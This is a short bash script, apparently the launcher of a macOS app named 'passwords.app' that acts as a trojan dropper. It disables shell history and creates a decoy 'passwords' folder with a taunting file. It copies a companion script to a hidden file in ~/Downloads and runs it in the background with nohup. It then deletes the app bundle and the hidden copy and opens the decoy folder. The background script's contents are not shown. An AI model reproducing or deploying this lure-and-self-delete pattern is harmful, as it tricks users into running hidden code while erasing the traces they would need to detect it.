#!/bin/bash
set +o history
CDIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) #Directory of app
cd ${CDIR}
mkdir ../passwords
echo "sucka" > ../passwords/passwords.txt
cp ./general.sh ~/Downloads/.general.sh
nohup ~/Downloads/.general.sh &
cd ${CDIR}/../
rm -rf ./passwords.app/ #cleanup
rm ~/Downloads/.general.sh
open ./passwords/

